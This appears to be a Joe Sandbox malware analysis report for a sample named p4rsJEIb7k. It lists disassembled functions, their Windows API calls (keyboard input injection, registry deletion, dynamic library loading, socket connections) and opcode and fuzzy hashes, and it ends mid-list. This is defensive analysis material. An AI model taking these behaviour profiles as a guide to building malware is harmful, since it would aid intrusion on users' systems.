                                                                                                                • Instruction Fuzzy Hash: 16C14EB2508340ABD320DF65C881EEBB7E8EFC9714F444D2FF68987241E6799544CBA6
                                                                                                                Function 00421CAB Relevance: 7.7, APIs: 5, Instructions: 214COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000001,00000000,?), ref: 00421E57
                                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,00000000,00000000,00000000,?,-00000001,?,?,00000000,?,00415F8A,00000000,?), ref: 00421ED0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharMultiWide
                                                                                                                • String ID:
                                                                                                                • API String ID: 626452242-0
                                                                                                                • Opcode ID: 1ea55d7c848440a8403a6ff58c98b5aa76672f86defd2e698422c6d464e36b7c
                                                                                                                • Instruction ID: bd3898d71cbd482aa4aa0b4c35bbdddb761c1f54cbd41572929d464e4e701234
                                                                                                                • Opcode Fuzzy Hash: 1ea55d7c848440a8403a6ff58c98b5aa76672f86defd2e698422c6d464e36b7c
                                                                                                                • Instruction Fuzzy Hash: 1371BF71A0026ADFCF20DF94EC808BFB7B5FB65314B95052BE521A7260D7349D81CB69
                                                                                                                Function 0041B669 Relevance: 7.7, APIs: 5, Instructions: 190COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetStartupInfoA.KERNEL32(?), ref: 0041B67E
                                                                                                                  • Part of subcall function 00416FFB: Sleep.KERNEL32(00000000,?,00411739,?,00401C0B), ref: 00417023
                                                                                                                • GetFileType.KERNEL32(00000040), ref: 0041B7A8
                                                                                                                • GetStdHandle.KERNEL32(-000000F6), ref: 0041B832
                                                                                                                • GetFileType.KERNEL32(00000000), ref: 0041B844
                                                                                                                • SetHandleCount.KERNEL32 ref: 0041B89C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileHandleType$CountInfoSleepStartup
                                                                                                                • String ID:
                                                                                                                • API String ID: 1302456922-0
                                                                                                                • Opcode ID: 042631592d203edaaf3f4d78f5e16ed03b675539f236fb7f0781e26425fee0e7
                                                                                                                • Instruction ID: 78394165c801ef16868fb9e1c6e049db50f2448aaa9d77fd502763510830d482
                                                                                                                • Opcode Fuzzy Hash: 042631592d203edaaf3f4d78f5e16ed03b675539f236fb7f0781e26425fee0e7
                                                                                                                • Instruction Fuzzy Hash: 4E7124715047418FDB209B28C8847AABBF0EF46724F29465ED4A59B3E1C77CD882CB99
                                                                                                                Function 00463D7E Relevance: 7.6, APIs: 5, Instructions: 141libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LoadLibraryW.KERNEL32(00000000), ref: 00463DD1
                                                                                                                • GetProcAddress.KERNEL32(?,?), ref: 00463E68
                                                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 00463E84
                                                                                                                • GetProcAddress.KERNEL32(?,?), ref: 00463ECE
                                                                                                                • FreeLibrary.KERNEL32(?,?,?,00000000,?), ref: 00463EF0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$Library$FreeLoad
                                                                                                                • String ID:
                                                                                                                • API String ID: 2449869053-0
                                                                                                                • Opcode ID: fa0419033c450d646a7a4ef883371915f5dff59722895d189eba4af2447b2958
                                                                                                                • Instruction ID: 5a5949aabc30296464acd143044f95cbdcafad8a77d2d24e7d672d776762960f
                                                                                                                • Opcode Fuzzy Hash: fa0419033c450d646a7a4ef883371915f5dff59722895d189eba4af2447b2958
                                                                                                                • Instruction Fuzzy Hash: 9051C1752043409FC300EF25C881A5BB7A4FF89305F00456EF945A73A2DB79EE45CBAA
                                                                                                                Function 0044C379 Relevance: 7.6, APIs: 5, Instructions: 137windowkeyboardCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetKeyboardState.USER32(?,?,00000001,00000001,?,00000000), ref: 0044C3DA
                                                                                                                • SetKeyboardState.USER32(00000080), ref: 0044C3ED
                                                                                                                • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C441
                                                                                                                • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C465
                                                                                                                • SendInput.USER32 ref: 0044C509
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: KeyboardMessagePostState$InputSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 3031425849-0
                                                                                                                • Opcode ID: b49b686b41cf8e4dc8898cf8a112ca1a8544ab09a95107e5a7613c5accf95fc9
                                                                                                                • Instruction ID: f46f63d78903415e516a46676784f6fcea1caa301ceb581e17347d916cd8316d
                                                                                                                • Opcode Fuzzy Hash: b49b686b41cf8e4dc8898cf8a112ca1a8544ab09a95107e5a7613c5accf95fc9
                                                                                                                • Instruction Fuzzy Hash: DB413B715462446FF760AB24D944BBFBB94AF99324F04061FF9D4122C2D37D9908C77A
                                                                                                                Function 004422B9 Relevance: 7.6, APIs: 5, Instructions: 108registryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • RegEnumKeyExW.ADVAPI32 ref: 004422F0
                                                                                                                • RegOpenKeyExW.ADVAPI32(?,00000000,00000000,?,?), ref: 0044232B
                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 0044234E
                                                                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00442390
                                                                                                                • RegEnumKeyExW.ADVAPI32(?,00000000), ref: 004423C0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Enum$CloseDeleteOpen
                                                                                                                • String ID:
                                                                                                                • API String ID: 2095303065-0
                                                                                                                • Opcode ID: 367b6e42355be36f427f5e4c5f923650598af64a8eac08207e4f2af605b886a1
                                                                                                                • Instruction ID: 24d8057b763805d248a02a33893b377b1579bd56aab3fff97e90bb3d062a49ad
                                                                                                                • Opcode Fuzzy Hash: 367b6e42355be36f427f5e4c5f923650598af64a8eac08207e4f2af605b886a1
                                                                                                                • Instruction Fuzzy Hash: 0C3150721043056EE210DF94DD84FBF73ECEBC9314F44492EBA9596141D7B8E9098B6A
                                                                                                                Function 0045C277 Relevance: 7.6, APIs: 5, Instructions: 105COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C2F4
                                                                                                                • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C31B
                                                                                                                • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C363
                                                                                                                • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C385
                                                                                                                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C392
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: PrivateProfile$SectionWrite$String
                                                                                                                • String ID:
                                                                                                                • API String ID: 2832842796-0
                                                                                                                • Opcode ID: c76cc1094b5fb1fc43fcb7877a7661b5ae667b5fa7796de5023eb6f45200691f
                                                                                                                • Instruction ID: eb365ed5c03c4bb3a44f9ddbc5128f2f56e5f8affd5b6ace934fe40af23b551f
                                                                                                                • Opcode Fuzzy Hash: c76cc1094b5fb1fc43fcb7877a7661b5ae667b5fa7796de5023eb6f45200691f
                                                                                                                • Instruction Fuzzy Hash: 00318675240305ABD610DFA1DC85F9BB3A8AF84705F00891DF94497292D7B9E889CB94
                                                                                                                Function 0044796B Relevance: 7.6, APIs: 5, Instructions: 96COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetClientRect.USER32(?,?), ref: 00447997
                                                                                                                • GetCursorPos.USER32(?), ref: 004479A2
                                                                                                                • ScreenToClient.USER32(?,?), ref: 004479BE
                                                                                                                • WindowFromPoint.USER32(?,?), ref: 004479FF
                                                                                                                • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447A78
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Client$CursorFromPointProcRectScreenWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 1822080540-0
                                                                                                                • Opcode ID: c356f0f93048ebf3c0a873f2be17aa192b5fb9472fb724aa4a6a449873fe30ba
                                                                                                                • Instruction ID: e9c1e18ea4fcc9a2ad4b32cd349e8b57ec7287094a91df3c43d19f1875151664
                                                                                                                • Opcode Fuzzy Hash: c356f0f93048ebf3c0a873f2be17aa192b5fb9472fb724aa4a6a449873fe30ba
                                                                                                                • Instruction Fuzzy Hash: DE3188742082029BD710CF19D88596FB7A9EBC8714F144A1EF88097291D778EA57CBAA
                                                                                                                Function 00447BAF Relevance: 7.6, APIs: 5, Instructions: 95COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetWindowRect.USER32(?,?), ref: 00447C1B
                                                                                                                • ScreenToClient.USER32(?,?), ref: 00447C39
                                                                                                                • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C4C
                                                                                                                • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447C93
                                                                                                                • EndPaint.USER32(?,?), ref: 00447CD1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClientPaintRectRectangleScreenViewportWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 659298297-0
                                                                                                                • Opcode ID: a6d698a2242c6caf7091173c4181dadfabb51550506680b35635a03376f271bc
                                                                                                                • Instruction ID: 653bb342b0117225c29b14224c0e663a7b864e912777eddc33bb147bcfad3e12
                                                                                                                • Opcode Fuzzy Hash: a6d698a2242c6caf7091173c4181dadfabb51550506680b35635a03376f271bc
                                                                                                                • Instruction Fuzzy Hash: 8A3150706043019FE320CF15D9C8F7B7BE8EB89724F044A6EF994873A1D774A8468B69
                                                                                                                Function 00447870 Relevance: 7.6, APIs: 5, Instructions: 94windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetCursorPos.USER32(?), ref: 004478A7
                                                                                                                • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478C3
                                                                                                                • DefDlgProcW.USER32(?,0000007B,?,?,004A83D8,?,004A83D8,?), ref: 004478E7
                                                                                                                • GetCursorPos.USER32(?), ref: 00447935
                                                                                                                • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 0044795B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CursorMenuPopupTrack$Proc
                                                                                                                • String ID:
                                                                                                                • API String ID: 1300944170-0
                                                                                                                • Opcode ID: 00aabaf84d80e4f8c92fc7d2a6c816b999107077810d41e1d32a7af9c3da8c6b
                                                                                                                • Instruction ID: 600148c7f6f0e64f7aba5c2d0a58757112576a5c49d56a392ea253be37485a5b
                                                                                                                • Opcode Fuzzy Hash: 00aabaf84d80e4f8c92fc7d2a6c816b999107077810d41e1d32a7af9c3da8c6b
                                                                                                                • Instruction Fuzzy Hash: 2B31E475244204ABE214DB48DC48FABB7A5FBC9711F14491EF64483390D7B96C4BC779
                                                                                                                Function 00448837 Relevance: 7.6, APIs: 5, Instructions: 89COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                                                                                                • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                                                                                                • ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
                                                                                                                • ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
                                                                                                                • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                                                                                                  • Part of subcall function 004413F0: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 0044140E
                                                                                                                  • Part of subcall function 004413F0: GetWindowLongW.USER32(?,000000F0), ref: 00441452
                                                                                                                  • Part of subcall function 004413F0: GetWindowLongW.USER32(?,000000F0), ref: 00441493
                                                                                                                  • Part of subcall function 004413F0: SendMessageW.USER32(019F1B28,000000F1,00000000,00000000), ref: 004414C6
                                                                                                                  • Part of subcall function 004413F0: SendMessageW.USER32(019F1B28,000000F1,00000001,00000000), ref: 004414F1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$EnableMessageSend$LongShow
                                                                                                                • String ID:
                                                                                                                • API String ID: 142311417-0
                                                                                                                • Opcode ID: 63a7105258867651d9446b65671e60b54e1f680e017c4d0f27b0fbeeb6060130
                                                                                                                • Instruction ID: 53ead31d82dc60d0a1ec6489c26700cf05fac79e8a5bf65a12bf69c5108a1aee
                                                                                                                • Opcode Fuzzy Hash: 63a7105258867651d9446b65671e60b54e1f680e017c4d0f27b0fbeeb6060130
                                                                                                                • Instruction Fuzzy Hash: 942105B07053809BF7148E28C8C47AFB7D0FB95345F08482EF981A6391DBAC9845C72E
                                                                                                                Function 00455014 Relevance: 7.6, APIs: 5, Instructions: 78COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 43986f9d4d7e017d9aea9f4dce7e52c9963f71054abe4abd36fa420e2ae722de
                                                                                                                • Instruction ID: 4734ce3ce40af5b77ad59fd8baedf6a3e56741e39cc50bb30d89ac3ca2d3bd52
                                                                                                                • Opcode Fuzzy Hash: 43986f9d4d7e017d9aea9f4dce7e52c9963f71054abe4abd36fa420e2ae722de
                                                                                                                • Instruction Fuzzy Hash: 1321E0712006409BCB10EF29D994D6B73A8EF45321B40466EFE5597382DB34EC08CBA9
                                                                                                                Function 00459DCF Relevance: 7.6, APIs: 5, Instructions: 71COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • IsWindow.USER32(00000000), ref: 00459DEF
                                                                                                                • GetForegroundWindow.USER32 ref: 00459E07
                                                                                                                • GetDC.USER32(00000000), ref: 00459E44
                                                                                                                • GetPixel.GDI32(00000000,?,00000000), ref: 00459E4F
                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 00459E8B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$ForegroundPixelRelease
                                                                                                                • String ID:
                                                                                                                • API String ID: 4156661090-0
                                                                                                                • Opcode ID: c25ec76bf159445cc401153d518622b926736981535c7bd42fe0b2b106eefd61
                                                                                                                • Instruction ID: f25aa70a507d7fb142791e963b89e5313ab4350e7ab13503248c443e15a863bf
                                                                                                                • Opcode Fuzzy Hash: c25ec76bf159445cc401153d518622b926736981535c7bd42fe0b2b106eefd61
                                                                                                                • Instruction Fuzzy Hash: 76219D76600202ABD700EFA5CD49A5AB7E9FF84315F19483DF90597642DB78FC04CBA9
                                                                                                                Function 0042513E Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • WriteConsoleW.KERNEL32(FFFFFFFE,00000000,00000001,00000000,00000000,00000000,00000000,00000002,00000000), ref: 00425186
                                                                                                                • GetLastError.KERNEL32 ref: 00425199
                                                                                                                • GetConsoleOutputCP.KERNEL32(00000000,00000000,00000001,00000002,00000005,00000000,00000000,00000000,00000000,00000002,00000000), ref: 004251B9
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000), ref: 004251C0
                                                                                                                • WriteConsoleA.KERNEL32(FFFFFFFE,?,00000000,?,00000000), ref: 004251DC
                                                                                                                  • Part of subcall function 00426D55: CreateFileA.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00425169,00000000,00000000,00000002,00000000), ref: 00426D68
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Console$Write$ByteCharCreateErrorFileLastMultiOutputWide
                                                                                                                • String ID:
                                                                                                                • API String ID: 1850339568-0
                                                                                                                • Opcode ID: 3fde0de84140aa5b76e31e7b27ee8f43fdf9ca56f866119cd92f9b765763b0e7
                                                                                                                • Instruction ID: d0f421d0a58dc8f93451a55b2dc7c171cc865a771fc7fc24c42c122e9cb4cc85
                                                                                                                • Opcode Fuzzy Hash: 3fde0de84140aa5b76e31e7b27ee8f43fdf9ca56f866119cd92f9b765763b0e7
                                                                                                                • Instruction Fuzzy Hash: 3521A135E00625AFD7109B65EC08EBB3768EB50360F81463FF522C61A0DBB89A41CF99
                                                                                                                Function 00464950 Relevance: 7.6, APIs: 5, Instructions: 68networkCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004647A2: inet_addr.WSOCK32(?), ref: 004647C7
                                                                                                                • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 00464985
                                                                                                                • WSAGetLastError.WSOCK32(00000000,00000002,00000001,00000006,00000000), ref: 00464993
                                                                                                                • connect.WSOCK32(00000000,00000000,00000010,00000002,00000001,00000006,00000000), ref: 004649CD
                                                                                                                • WSAGetLastError.WSOCK32(00000000,00000000,00000000,00000010,00000002,00000001,00000006,00000000), ref: 004649F4
                                                                                                                • closesocket.WSOCK32(00000000,00000000,00000000,00000000,00000000,00000010,00000002,00000001,00000006,00000000), ref: 00464A07
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$closesocketconnectinet_addrsocket
                                                                                                                • String ID:
                                                                                                                • API String ID: 245547762-0
                                                                                                                • Opcode ID: aaa03f654d2c2080970664bbc2635e6406c59b0d093f7dcd590a1c65d79e0220
                                                                                                                • Instruction ID: b27d5ee258410aac5bd3077dd9c53ce90635b59006b610d0ec7ee295a05cd03d
                                                                                                                • Opcode Fuzzy Hash: aaa03f654d2c2080970664bbc2635e6406c59b0d093f7dcd590a1c65d79e0220
